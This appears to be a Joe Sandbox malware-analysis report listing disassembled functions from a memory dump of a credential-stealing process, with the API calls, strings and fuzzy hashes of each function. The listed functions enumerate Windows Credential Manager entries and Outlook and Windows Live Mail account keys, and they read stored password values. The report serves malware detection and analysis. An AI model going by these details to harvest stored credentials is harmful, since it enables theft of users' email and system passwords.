                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                • API String ID: 665470638-2687544566
                                                                                                                • Opcode ID: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                                                                                                • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                • Opcode Fuzzy Hash: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                                                                                                • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • sprintf.MSVCRT ref: 0040957B
                                                                                                                • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                • sprintf.MSVCRT ref: 004095EB
                                                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                • memset.MSVCRT ref: 0040961C
                                                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                                                • API String ID: 3259144588-3822380221
                                                                                                                • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                • API String ID: 2449869053-4258758744
                                                                                                                • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                • memset.MSVCRT ref: 0040F84A
                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                • String ID: Creds$ps:password
                                                                                                                • API String ID: 551151806-1872227768
                                                                                                                • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • wcsstr.MSVCRT ref: 0040426A
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                • _mbscpy.MSVCRT ref: 004042D5
                                                                                                                • _mbscpy.MSVCRT ref: 004042E8
                                                                                                                • strchr.MSVCRT ref: 004042F6
                                                                                                                • strlen.MSVCRT ref: 0040430A
                                                                                                                • sprintf.MSVCRT ref: 0040432B
                                                                                                                • strchr.MSVCRT ref: 0040433C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                                                • API String ID: 3866421160-4070641962
                                                                                                                • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _mbscpy.MSVCRT ref: 00409749
                                                                                                                • _mbscpy.MSVCRT ref: 00409759
                                                                                                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                • _mbscpy.MSVCRT ref: 004097A1
                                                                                                                • memset.MSVCRT ref: 004097BD
                                                                                                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                • API String ID: 1035899707-3647959541
                                                                                                                • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy
                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                • API String ID: 714388716-318151290
                                                                                                                • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                  • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                  • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                  • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                • String ID:
                                                                                                                • API String ID: 1416211542-0
                                                                                                                • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                • API String ID: 2360744853-2229823034
                                                                                                                • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                • memset.MSVCRT ref: 00402C9D
                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                • memset.MSVCRT ref: 00402CF7
                                                                                                                • sprintf.MSVCRT ref: 00402D10
                                                                                                                • sprintf.MSVCRT ref: 00402D4E
                                                                                                                  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                  • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                • API String ID: 1831126014-3814494228
                                                                                                                • Opcode ID: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
                                                                                                                • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                • Opcode Fuzzy Hash: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
                                                                                                                • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                                                • _mbscpy.MSVCRT ref: 004100F2
                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                • _mbscpy.MSVCRT ref: 00410142
                                                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                                                • memset.MSVCRT ref: 00410129
                                                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                                                                                • memset.MSVCRT ref: 00410171
                                                                                                                • memcpy.MSVCRT ref: 0041018C
                                                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 912701516-1821301763
                                                                                                                • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$strlen
                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                • API String ID: 2619041689-3408036318
                                                                                                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4288758904-3916222277
                                                                                                                • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                                                • _wcsncoll.MSVCRT ref: 00408794
                                                                                                                • memset.MSVCRT ref: 0040882A
                                                                                                                • memcpy.MSVCRT ref: 00408849
                                                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                • String ID: J$Microsoft_WinInet
                                                                                                                • API String ID: 2203907242-260894208
                                                                                                                • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004108E5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                • memcpy.MSVCRT ref: 00410961
                                                                                                                Strings
                                                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FromStringUuid$memcpy
                                                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                • API String ID: 2859077140-2022683286
                                                                                                                • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                • strlen.MSVCRT ref: 00406CCC
                                                                                                                • _mbscpy.MSVCRT ref: 00406CDC
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                • _mbscpy.MSVCRT ref: 00406CF6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                • API String ID: 2881943006-572158859
                                                                                                                • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

